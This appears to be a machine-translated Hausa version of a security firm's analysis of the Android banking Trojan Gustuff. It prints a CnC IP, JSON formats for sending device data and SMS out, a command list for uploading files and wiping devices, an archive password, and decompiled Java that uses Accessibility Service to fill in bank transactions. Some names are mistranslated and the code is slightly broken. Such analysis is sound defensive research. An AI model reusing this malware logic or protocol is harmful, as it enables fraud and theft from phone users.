Kamar sauran rana Group-IB game da ayyukan wayar hannu ta Android Trojan Gustuff. Yana aiki ne kawai a kasuwannin duniya, yana kai hari ga abokan ciniki na manyan bankunan waje na 100, masu amfani da walat ɗin crypto 32 na wayar hannu, da kuma manyan albarkatun e-commerce. Amma mawallafin Gustuff wani mai aikata laifukan intanet ne na Rashanci a ƙarƙashin sunan Bestoffer. Har kwanan nan, ya yaba Trojan ɗinsa a matsayin "samfuri mai mahimmanci ga mutane masu ilimi da ƙwarewa."
ƙwararren ƙwararren ƙididdiga na ƙididdiga a Rukunin-IB Ivan Pisarev a cikin bincikensa, ya yi magana dalla-dalla game da yadda Gustuff ke aiki da kuma menene haɗarinsa.
Wanene Gustuff yake farauta?
Gustuff na sabon ƙarni ne na malware tare da cikakkun ayyuka masu sarrafa kansa. A cewar mawallafin, Trojan ya zama sabon kuma ingantacciyar sigar AndyBot malware, wanda tun a watan Nuwamba 2017 yake kai hari kan wayoyin Android tare da satar kudi ta hanyar yanar gizo na phishing a matsayin aikace-aikacen wayar hannu na sanannun bankunan duniya da tsarin biyan kuɗi. Bestoffer ya ruwaito cewa farashin hayar Gustuff Bot shine $800 kowane wata.
Binciken samfurin Gustuff ya nuna cewa Trojan na iya yin niyya ga abokan ciniki ta amfani da aikace-aikacen hannu na manyan bankunan, kamar Bankin Amurka, Bankin Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, Bankin PNC, da walat ɗin crypto. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, da dai sauransu.
Asalin asali an ƙirƙira shi azaman Trojan na banki na yau da kullun, a cikin sigar yanzu Gustuff ya faɗaɗa jerin abubuwan da ake iya kaiwa hari. Baya ga aikace-aikacen Android don bankuna, kamfanonin fintech da sabis na crypto, Gustuff yana nufin masu amfani da aikace-aikacen kasuwa, shagunan kan layi, tsarin biyan kuɗi da saƙon nan take. Musamman PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut da sauransu.
Ma'anar shigarwa: lissafi don yawan kamuwa da cuta
Gustuff yana da siffa ta "classic" vector na shiga cikin wayoyin hannu na Android ta hanyar aika wasiku ta SMS tare da hanyoyin haɗi zuwa APKs. Lokacin da na'urar Android ta kamu da Trojan bisa ga umarnin uwar garken, Gustuff na iya yaduwa ta hanyar bayanan tuntuɓar wayar da ta kamu da cutar ko ta hanyar bayanan uwar garken. Ayyukan Gustuff an tsara shi don kamuwa da cuta mai yawa da matsakaicin girman kasuwancin ma'aikatan sa - yana da aikin "cika kai tsaye" na musamman a cikin ingantattun aikace-aikacen banki ta hannu da walat ɗin crypto, wanda ke ba ku damar haɓakawa da haɓaka satar kuɗi.
Wani bincike na Trojan ya nuna cewa an aiwatar da aikin autofill a cikinsa ta amfani da Sabis na Samun damar, sabis ga mutanen da ke da nakasa. Gustuff ba shine Trojan na farko da ya sami nasarar ketare kariya daga hulɗa tare da abubuwan taga na sauran aikace-aikacen ta amfani da wannan sabis ɗin Android ba. Koyaya, amfani da Sabis ɗin Samun dama a haɗe tare da injin mota har yanzu ba kasafai bane.
Bayan zazzagewa zuwa wayar wanda aka azabtar, Gustuff, ta amfani da Sabis ɗin Samun damar, yana iya yin hulɗa tare da abubuwan taga na sauran aikace-aikacen (banki, cryptocurrency, da aikace-aikacen sayayya ta kan layi, saƙo, da sauransu), yin ayyukan da suka wajaba ga maharan. . Misali, a umarnin uwar garken, Trojan na iya danna maɓallan kuma canza ƙimar filayen rubutu a aikace-aikacen banki. Amfani da tsarin Sabis ɗin Samun damar Trojan yana ba Trojan damar ketare hanyoyin tsaro da bankuna ke amfani da su don magance Trojans na wayar hannu na ƙarni na baya, da kuma canje-canjen manufofin tsaro da Google ke aiwatarwa a cikin sabbin nau'ikan Android OS. Don haka, Gustuff "ya san yadda" za a kashe kariyar Google: a cewar marubucin, wannan aikin yana aiki a cikin 70% na lokuta.
Gustuff kuma yana iya nuna sanarwar PUSH na karya tare da gumakan halaltattun aikace-aikacen hannu. Mai amfani yana danna sanarwar PUSH kuma ya ga taga phishing da aka zazzage daga uwar garken, inda ya shigar da katin banki da ake buƙata ko bayanan walat ɗin crypto. A wani yanayin Gustuff, aikace-aikacen da aka nuna sanarwar PUSH a madadinsa an buɗe. A wannan yanayin, malware, kan umarni daga uwar garken ta hanyar Sabis na Samun dama, na iya cike fom ɗin aikace-aikacen banki don ma'amala ta yaudara.
Ayyukan Gustuff kuma sun haɗa da aika bayanai game da na'urar da ta kamu da cutar zuwa uwar garken, ikon karantawa/aika saƙonnin SMS, aika buƙatun USSD, ƙaddamar da wakili na SOCKS5, bin hanyar haɗin gwiwa, aika fayiloli (ciki har da sikanin hoto na takardu, hotuna, hotuna) zuwa ga uwar garken , sake saita na'urar zuwa saitunan masana'anta.
Malware Analysis
Kafin shigar da mugun aiki, Android OS yana nuna wa mai amfani taga mai ɗauke da jerin haƙƙoƙin da Gustuff ya nema:
Za a shigar da aikace-aikacen ne kawai bayan karɓar izinin mai amfani. Bayan ƙaddamar da aikace-aikacen, Trojan zai nuna wa mai amfani taga:
Bayan haka za ta cire gunkinsa.
An cika Gustuff, a cewar marubucin, ta mai fakitin FTT. Bayan farawa, aikace-aikacen lokaci-lokaci yana tuntuɓar uwar garken CnC don karɓar umarni. Fayiloli da yawa da muka bincika sun yi amfani da adireshin IP azaman uwar garken sarrafawa 88.99.171[.]105 (nan gaba za mu nuna shi kamar <%CnC%>).
Bayan kaddamarwa, shirin ya fara aika saƙonni zuwa uwar garken http://<%CnC%>/api/v1/get.php.
Ana sa ran amsa ta zama JSON a cikin tsari mai zuwa:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Duk lokacin da aka shiga aikace-aikacen, yana aika bayanai game da na'urar da ta kamu da cutar. Ana nuna tsarin saƙo a ƙasa. Yana da daraja a lura cewa filayen full, karin, apps и izinin - na zaɓi kuma za a aika shi kawai idan akwai umarnin buƙata daga CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Ajiye bayanan sanyi
Gustuff yana adana mahimman bayanai masu aiki a cikin fayil ɗin zaɓi. Sunan fayil ɗin, da kuma sunayen sigogin da ke cikinsa, sakamakon ƙididdige jimlar MD5 ne daga kirtani. 15413090667214.6.1<%name%>inda <%name%> - sunan farko-darajar. Fassarar Python aikin tsara sunan:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
A cikin abin da ya biyo baya za mu nuna shi kamar haka sunan Generator(shigarwa).
Don haka sunan fayil na farko shine: Generator ("API_SERVER_LIST"), yana ƙunshe da ƙima mai suna kamar haka:
| Sunan mai canzawa | Ma'ana |
|---|---|
| Generator ("API_SERVER_LIST") | Ya ƙunshi jerin adiresoshin CnC a cikin hanyar tsararru. |
| Generator ("API_SERVER_URL") | Ya ƙunshi adireshin CnC. |
| Generator ("SMS_UPLOAD") | An saita tutar ta tsohuwa. Idan an saita tutar, aika saƙonnin SMS zuwa CnC. |
| Generator ("SMS_ROOT_NUMBER") | Lambar waya wacce za a aika saƙonnin SMS ta na'urar da ta kamu da ita. Default ba komai bane. |
| Generator ("SMS_ROOT_NUMBER_RESEND") | An share tuta ta tsohuwa. Idan an shigar, lokacin da na'urar da ta kamu da cutar ta karɓi SMS, za a aika zuwa tushen lambar. |
| Generator ("DEFAULT_APP_SMS") | An share tuta ta tsohuwa. Idan an saita wannan tutar, aikace-aikacen zai aiwatar da saƙon SMS masu shigowa. |
| Generator ("DEFAULT_ADMIN") | An share tuta ta tsohuwa. Idan an saita tutar, aikace-aikacen yana da haƙƙin gudanarwa. |
| Generator ("DEFAULT_ACCESSIBILITY") | An share tuta ta tsohuwa. Idan an saita tuta, sabis na amfani da Sabis na Samun dama yana gudana. |
| Generator ("APPS_CONFIG") | Abu na JSON wanda ya ƙunshi jerin ayyukan da dole ne a yi lokacin da aka kunna taron Samun dama da ke da alaƙa da takamaiman aikace-aikacen. |
| Generator ("APPS_INSTALLED") | Yana adana jerin aikace-aikacen da aka shigar akan na'urar. |
| Generator ("IS_FIST_RUN") | An sake saita tutar a farkon farko. |
| Generator ("UNIQUE_ID") | Ya ƙunshi mai ganowa na musamman. An ƙirƙira lokacin da aka ƙaddamar da bot a karon farko. |
Module don sarrafa umarni daga uwar garken
Aikace-aikacen yana adana adiresoshin sabobin CnC a cikin tsarin tsararru wanda aka rufa masa asiri Base85 layuka. Za a iya canza jerin sabar CnC bayan samun umarnin da ya dace, wanda a cikin wannan yanayin za a adana adiresoshin a cikin fayil ɗin da aka zaɓa.
Don amsa buƙatar, uwar garken yana aika umarni zuwa aikace-aikacen. Yana da kyau a lura cewa ana gabatar da umarni da sigogi a tsarin JSON. Aikace-aikacen na iya aiwatar da umarni masu zuwa:
| tawagar | Description |
|---|---|
| gabaFara | Fara aika saƙonnin SMS da aka karɓa daga na'urar da ta kamu da cutar zuwa uwar garken CnC. |
| Tsayawa gaba | Dakatar da aika saƙonnin SMS da aka karɓa daga na'urar da ta kamu da cutar zuwa uwar garken CnC. |
| ussdRun | Yi buƙatar USSD. Lambar da kuke buƙatar yin buƙatar USSD tana cikin filin JSON "lambar". |
| aika SMS | Aika saƙon SMS guda ɗaya (idan ya cancanta, saƙon ya “rabe” zuwa sassa). A matsayin ma'auni, umarnin yana ɗaukar abu JSON mai ɗauke da filayen "zuwa" - lambar wurin da "jiki" - jikin saƙon. |
| aika SMSAb | Aika saƙonnin SMS (idan ya cancanta, saƙon ya “rabe” zuwa sassa) ga kowa da kowa a cikin jerin lambobin sadarwa na na'urar da ta kamu da cutar. Tazarar tsakanin aika saƙonni shine daƙiƙa 10. Jikin saƙon yana cikin filin JSON "jiki" |
| aika SMSMass | Aika saƙonnin SMS (idan ya cancanta, saƙon yana “raga” cikin sassa) zuwa lambobin da aka ƙayyade a cikin sigogin umarni. Tazarar tsakanin aika saƙonni shine daƙiƙa 10. A matsayin ma'auni, umarnin yana ɗaukar tsarin JSON (filin "sms"), abubuwan da suka ƙunshi filayen "zuwa" - lambar makoma da "jiki" - jikin saƙon. |
| canza uwar garken | Wannan umarni na iya ɗaukar ƙima tare da maɓallin “url” azaman siga - sannan bot ɗin zai canza ƙimar sunan Generator (“SERVER_URL”), ko “array” - sannan bot ɗin zai rubuta tsararrun zuwa suna Generator (“API_SERVER_LIST”) Don haka, aikace-aikacen yana canza adireshin sabar CnC. |
| admin Number | An tsara umarnin don aiki tare da lambar tushe. Umurnin yana karɓar abu JSON tare da sigogi masu zuwa: "lambar" - canza sunan Generator ("ROOT_NUMBER") zuwa ƙimar da aka karɓa, "sake aikawa" - canza sunan Generator ("SMS_ROOT_NUMBER_RESEND"), "sendId" - aika zuwa sunan Generator ("ROOT_NUMBER" ID na musamman. |
| updateInfo | Aika bayanai game da na'urar da ta kamu da cutar zuwa uwar garken. |
| gogeData | An yi nufin umarnin don share bayanan mai amfani. Dangane da sunan da aka ƙaddamar da aikace-aikacen, ko dai an goge bayanan gaba ɗaya tare da sake kunna na'urar (mai amfani na farko), ko kuma an share bayanan mai amfani kawai (mai amfani na biyu). |
| socksStart | Kaddamar da Proxy module. An kwatanta aikin tsarin a cikin wani sashe daban. |
| safa Tasha | Dakatar da tsarin wakili. |
| budeLink | Bi hanyar haɗin yanar gizon. Mahadar tana cikin ma'aunin JSON a ƙarƙashin maɓallin "url". Ana amfani da "android.intent.action.VIEW" don buɗe hanyar haɗin yanar gizon. |
| uploadAllSms | Aika duk saƙonnin SMS da na'urar ta karɓa zuwa uwar garken. |
| uploadAllPhotos | Aika hotuna daga na'urar da ta kamu da cutar zuwa URL. URL ɗin ya zo a matsayin siga. |
| uploadFile | Aika fayil zuwa URL daga na'urar da ta kamu da cutar. URL ɗin ya zo a matsayin siga. |
| loda Lambobin waya | Aika lambobin waya daga lissafin tuntuɓar ku zuwa uwar garken. Idan ƙimar abu JSON mai maɓalli "ab" aka karɓi azaman ma'auni, aikace-aikacen yana karɓar jerin lambobin sadarwa daga littafin waya. Idan an karɓi abu JSON mai maɓalli "sms" azaman siga, aikace-aikacen yana karanta jerin lambobin sadarwa daga masu aika saƙonnin SMS. |
| canza Taskar Labarai | Aikace-aikacen yana zazzage fayil ɗin daga adireshin da ya zo azaman siga ta amfani da maɓallin “url”. An ajiye fayil ɗin da aka sauke tare da sunan "archive.zip". Aikace-aikacen zai buɗe fayil ɗin, zaɓin ta amfani da kalmar sirrin "b5jXh37gxgHBrZhQ4j3D". An adana fayilolin da ba a buɗe ba a cikin [ma'ajiyar waje]/hgps directory. A cikin wannan jagorar, aikace-aikacen yana adana karyar yanar gizo (wanda aka kwatanta a ƙasa). |
| ayyuka | An tsara umarnin don yin aiki tare da Sabis na Ayyuka, wanda aka kwatanta a cikin wani sashe daban. |
| gwajin | Yin komai. |
| download | An yi nufin umarnin don zazzage fayil daga sabar mai nisa kuma a adana shi zuwa kundin “Zazzagewa”. URL da sunan fayil sun zo azaman siga, filaye a cikin abin sigar JSON, bi da bi: “url” da “FileName”. |
| cire | Yana cire fayil daga kundin "Zazzagewa". Sunan fayil ya zo a cikin sigar JSON tare da maɓallin "fayilName". Daidaitaccen sunan fayil shine "tmp.apk". |
| sanarwar | Nuna sanarwa tare da kwatance da rubutun take wanda uwar garken gudanarwa ta ayyana. |
Tsarin Umurni sanarwar:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Sanarwa da fayil ɗin da ke ƙarƙashin bincike ya yi kama da sanarwar da aikace-aikacen da aka ƙayyade a cikin filin ya haifar. app. Idan darajar filin budeApp — Gaskiya ne, lokacin da aka buɗe sanarwar, ana ƙaddamar da aikace-aikacen da aka ƙayyade a cikin filin app. Idan darajar filin budeApp - Karya, sannan:
- Ana buɗe taga phishing, abin da ke ciki ana zazzage shi daga kundin adireshi <% ajiya na waje%>/hgps/<% filename%>
- Ana buɗe taga phishing, abin da ke ciki ana zazzage shi daga uwar garken <%url%>?id=<%Bot id%>&app=<% Sunan aikace-aikace%>
- An buɗe taga mai phishing, mai kama da katin Google Play, tare da damar shigar da bayanan katin.
Aikace-aikacen yana aika sakamakon kowane umarni zuwa <%CnC%>set_state.php azaman abun JSON a cikin tsari mai zuwa:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
Sabis na Ayyuka
Jerin umarnin da tsarin aikace-aikacen ya ƙunshi mataki. Lokacin da aka karɓi umarni, tsarin sarrafa umarni yana samun dama ga wannan sabis ɗin don aiwatar da tsawaita umarnin. Sabis ɗin yana karɓar abu JSON azaman siga. Sabis ɗin na iya aiwatar da umarni masu zuwa:
1. PARAMS_ACTION - lokacin karɓar irin wannan umarni, sabis ɗin yana fara karba daga ma'aunin JSON ƙimar Maɓallin Nau'in, wanda zai iya zama kamar haka:
- bayanin sabis – Subcommand yana samun ƙimar ta maɓalli daga sigar JSON hada da Babu Muhimmanci. Idan tutar gaskiya ce, aikace-aikacen yana saita tuta FLAG_ISOLATED_PROCESS zuwa sabis ta amfani da Sabis na Samun dama. Ta wannan hanyar za a ƙaddamar da sabis ɗin a cikin wani tsari na daban.
- tushen - karɓa da aika zuwa bayanan uwar garke game da taga wanda ke kan mayar da hankali a halin yanzu. Aikace-aikacen yana samun bayanai ta amfani da ajin AccessibilityNodeInfo.
- admin - neman haƙƙin gudanarwa.
- jinkirta - dakatar da Sabis ɗin Ayyuka don adadin millise seconds da aka ƙayyade a cikin ma'auni don maɓallin "bayanai".
- windows - aika jerin windows ga mai amfani.
- shigar - shigar da aikace-aikacen akan na'urar da ta kamu da cutar. Sunan fakitin kayan tarihin yana cikin maɓallan "FileName". Rumbun da kansa yana cikin kundin adireshin Zazzagewa.
- duniya – subcommand an yi nufin kewayawa daga taga na yanzu:
- a menu na Saitunan Sauri
- baya
- gida
- ga sanarwa
- zuwa taga aikace-aikacen da aka buɗe kwanan nan
- jefa - kaddamar da aikace-aikacen. Sunan aikace-aikacen yana zuwa azaman siga ta maɓalli data.
- sauti - canza yanayin sauti zuwa shiru.
- buše - yana kunna hasken baya na allon da madannai zuwa cikakken haske. Aikace-aikacen yana yin wannan aikin ta amfani da WakeLock, yana ƙayyadadden kirtani [Labaran Aikace-aikacen]:INFO azaman alama.
- izinin overlay - ba a aiwatar da aikin ba (amsar aiwatar da umarni shine {"saƙo":"Ba tallafi"} ko {"saƙo":"low sdk"})
- gesture - ba a aiwatar da aikin ba (amsar aiwatar da umarni shine {"saƙo":"Ba a goyan bayan"} ko {"saƙo":"Ƙananan API"})
- izini - wannan umarni ya zama dole don neman izini don aikace-aikacen. Koyaya, ba a aiwatar da aikin tambayar, don haka umarnin ba shi da ma'ana. Jerin haƙƙoƙin da aka nema ya zo azaman tsararrun JSON tare da maɓallin “izini”. Daidaitaccen lissafin:
- Bayanin android.Karanta_PHONE_STATE
- android.izini.READ_CONTACTS
- android.izini.CALL_PHONE
- android.izini.KARBAR_SMS
- android.izini.SEND_SMS
- android.izni.KARANTA_SMS
- android.izini.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- bude - nuna taga phishing. Dangane da ma'aunin da ke fitowa daga uwar garken, aikace-aikacen na iya nuna windows masu phishing masu zuwa:
- Nuna taga phishing wanda abun ciki an rubuta cikin fayil a cikin kundin adireshi <% directory na waje%>/hgps/<%param_filename%>. Za a aika da sakamakon hulɗar mai amfani tare da taga <%CnC%>/records.php
- Nuna taga phishing wanda abinda ke ciki an riga an loda shi daga adireshin <%url_param%>?id=<%bot_id%>&app=<%packagename%>. Za a aika da sakamakon hulɗar mai amfani tare da taga <%CnC%>/records.php
- Nuna taga phishing mai kama da Katin Google Play.
- m - An tsara umarnin don yin hulɗa tare da abubuwan taga na wasu aikace-aikacen ta amfani da AcessibilityService. An aiwatar da sabis na musamman a cikin shirin don hulɗa. Aikace-aikacen da ke ƙarƙashin bincike na iya yin hulɗa tare da windows:
- A halin yanzu yana aiki. A wannan yanayin, ma'aunin yana ƙunshe da id ko rubutu (suna) na abin da kuke buƙatar yin hulɗa da shi.
- Ganuwa ga mai amfani a lokacin da aka aiwatar da umarnin. Aikace-aikacen yana zaɓar windows ta id.
Samun abubuwa Samun damarNodeInfo Don abubuwan taga mai ban sha'awa, aikace-aikacen, dangane da sigogi, na iya aiwatar da ayyuka masu zuwa:
- mayar da hankali - saita mayar da hankali ga abu.
- danna - danna kan wani abu.
- actionId - yi aiki ta ID.
- setText - canza rubutun abu. Canza rubutun yana yiwuwa ta hanyoyi biyu: aiwatar da aiki ACTION_SET_TEXT (idan nau'in Android na na'urar da ta kamu da cutar ta gaza ko kuma ta yi daidai da LOLLIPOP), ko ta sanya kirtani a kan allo da liƙa a cikin wani abu (don tsofaffin nau'ikan). Ana iya amfani da wannan umarni don canza bayanai a aikace-aikacen banki.
2. PARAMS_ACTIONS - sama da PARAMS_ACTION, JSON jerin umarni ne kawai suka zo.
Da alama mutane da yawa za su yi sha'awar yadda aikin hulɗa tare da abubuwan taga na wani aikace-aikacen ke kama. Wannan shine yadda ake aiwatar da wannan aikin a Gustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Aikin sauya rubutu:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Don haka, tare da daidaitaccen tsari na uwar garken sarrafawa, Gustuff zai iya cika filayen rubutu a cikin aikace-aikacen banki kuma danna maballin da suka dace don kammala ma'amala. Trojan ba ya buƙatar shiga cikin aikace-aikacen - ya isa ya aika umarni don nuna sanarwar PUSH sannan kuma buɗe aikace-aikacen banki da aka shigar a baya. Mai amfani zai tabbatar da kansa, bayan haka Gustuff zai iya cika motar.
Tsarin sarrafa saƙon SMS
Aikace-aikacen yana shigar da mai kula da taron don na'urar da ta kamu da cutar don karɓar saƙonnin SMS. Aikace-aikacen da ake nazari na iya karɓar umarni daga mai aiki, waɗanda ke zuwa cikin jikin saƙon SMS. Umurnai suna zuwa a cikin tsari:
7!5= <%Base64 encoded umarni%>
Aikace-aikacen yana neman kirtani a cikin duk saƙonnin SMS masu shigowa 7!5= ku, lokacin da aka gano kirtani, yana yanke kirtani daga Base64 a kashe 4 kuma yana aiwatar da umarni. Umarnin sun yi kama da waɗanda ke tare da CnC. Ana aika sakamakon aiwatarwa zuwa lamba ɗaya wanda umarnin ya fito. Tsarin amsawa:
7*5=<%Base64 encode na "umarnin sakamako_code"%>
Optionally, aikace-aikacen na iya aika duk saƙonnin da aka karɓa zuwa lambar Tushen. Don yin wannan, dole ne a ƙayyade lambar Tushen a cikin fayil ɗin da aka zaɓa kuma dole ne a saita tutar tura sakon. Ana aika saƙon SMS zuwa lambar maharin a cikin tsari:
<%Daga lamba%> - <%Lokaci, tsari: dd/MM/yyyy HH:mm:ss%> <%SMS jiki%>
Hakanan, ba zaɓin ba, aikace-aikacen na iya aika saƙonni zuwa CnC. Ana aika saƙon SMS zuwa uwar garken a cikin tsarin JSON:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Idan an saita tuta Generator ("DEFAULT_APP_SMS") - aikace-aikacen yana dakatar da sarrafa saƙon SMS kuma yana share jerin saƙonni masu shigowa.
Tsarin wakili
Aikace-aikacen da ke ƙarƙashin binciken yana ƙunshe da module Proxy na Backconnect (wanda ake magana da shi azaman Proxy module), wanda ke da aji daban wanda ya haɗa da filayen tsaye tare da daidaitawa. Ana adana bayanan saiti a cikin samfurin a bayyane:
Duk ayyukan da tsarin Proxy ya yi ana shiga cikin fayiloli. Don yin wannan, aikace-aikacen da ke cikin Ma'ajiyar Waje yana ƙirƙirar kundin adireshi mai suna "logs" (filin ProxyConfigClass.logsDir a cikin aji na daidaitawa), wanda a ciki ake adana fayilolin log. Shiga yana faruwa a cikin fayiloli masu suna:
- babban.txt - aikin aji da ake kira CommandServer yana shiga cikin wannan fayil ɗin. A cikin abin da ke biyo baya, shigar da kirtani str cikin wannan fayil za a nuna shi azaman mainLog (str).
- zaman-<% id%>.txt - wannan fayil yana adana bayanan log mai alaƙa da takamaiman zaman wakili. A cikin abin da ke biyo baya, shigar da kirtani zuwa wannan fayil za a nuna shi azaman sessionLog (str).
- uwar garken.txt - Ana amfani da wannan fayil ɗin don shigar da duk bayanan da aka rubuta zuwa fayilolin da aka kwatanta a sama.
Tsarin bayanan log:
<% Kwanan wata%> [Zare[<% thread id%>], id[]]: log-string
Abubuwan keɓancewa waɗanda ke faruwa yayin aiki na tsarin Proxy suma ana shigar dasu cikin fayil. Don yin wannan, aikace-aikacen yana haifar da abu JSON a cikin tsari mai zuwa:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Sa'an nan kuma ya mayar da shi zuwa wakilcin kirtani kuma ya rubuta shi.
An ƙaddamar da tsarin wakili bayan karɓar umarnin da ya dace. Lokacin da aka karɓi umarni don ƙaddamar da tsarin wakili, aikace-aikacen yana fara sabis da ake kira MainService, wanda ke da alhakin gudanar da aiki na Proxy module - farawa da dakatar da shi.
Matakan fara sabis:
1. Fara mai ƙidayar lokaci wanda ke gudana sau ɗaya a cikin minti kuma yana duba ayyukan ƙirar wakili. Idan tsarin ba ya aiki, yana farawa da shi.
Har ila yau lokacin da abin ya faru android.net.conn.CONNECTIVITY_CHANGE An ƙaddamar da tsarin wakili.
2. Aikace-aikacen yana ƙirƙirar kulle-kulle tare da siga BAYANI_WAKE_LOCK kuma ya kama shi. Wannan yana hana CPU na'urar shiga yanayin bacci.
3. Ya ƙaddamar da ajin sarrafa oda na Proxy module, fara shiga layi mainLog("farawar uwar garke") и
Server ::fara() mai watsa shiri[<%proxy_cnc%>], CommandPort[<% order_port%>], proxyPort[<%proxy_port%>]
inda proxy_cnc, Command_port da kuma proxy_port – sigogi da aka samo daga tsarin uwar garken wakili.
Ana kiran ajin sarrafa umarni Command Connection. Nan da nan bayan farawa, yana aiwatar da ayyuka masu zuwa:
4. Yana haɗi zuwa ProxyConfigClass.host: ProxyConfigClass.commandPort kuma yana aika bayanai game da na'urar da ta kamu da cutar a can cikin tsarin JSON:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Inda:
- id – mai ganowa, yana ƙoƙarin samun ƙima tare da filin “id” daga Fayil ɗin Zaɓin Raba mai suna “x”. Idan ba za a iya samun wannan ƙimar ba, tana haifar da wata sabuwa. Don haka, tsarin Proxy yana da nasa mai ganowa, wanda aka ƙirƙira shi daidai da Bot ID.
- imei - IMEI na na'urar. Idan kuskure ya faru yayin aiwatar da samun ƙimar, za a rubuta saƙon rubutu kuskure maimakon wannan filin.
- imsi — International Mobile Subscriber Identity na na'urar. Idan kuskure ya faru yayin aiwatar da samun ƙimar, za a rubuta saƙon rubutu kuskure maimakon wannan filin.
- samfurin - Sunan mai amfani na ƙarshe don samfurin ƙarshe.
- manufacturer - Mai sana'anta samfurin / hardware (Build.MANUFACTURER).
- androidVersion - kirtani a tsarin "<%release_version%> (<%os_version%>),<%sdk_version%>"
- kasar - halin yanzu wurin na'urar.
- partnerId fanko ne kirtani.
- Sunan kunshin - sunan kunshin.
- networkTpe - nau'in haɗin yanar gizo na yanzu (misali: "WIFI", "MOBILE"). Idan kuskure ya faru, ya dawo banza.
- hasGsmSupport - gaskiya - idan wayar tana goyan bayan GSM, in ba haka ba karya.
- simReady – Yanayin katin SIM.
- simCountry - lambar ƙasa ta ISO (dangane da mai bada katin SIM).
- Mai aiki da hanyar sadarwa - sunan mai aiki. Idan kuskure ya faru yayin aiwatar da samun ƙimar, za a rubuta saƙon rubutu kuskure maimakon wannan filin.
- simOperator - Sunan Mai Ba da Sabis (SPN). Idan kuskure ya faru yayin aiwatar da samun ƙimar, za a rubuta saƙon rubutu kuskure maimakon wannan filin.
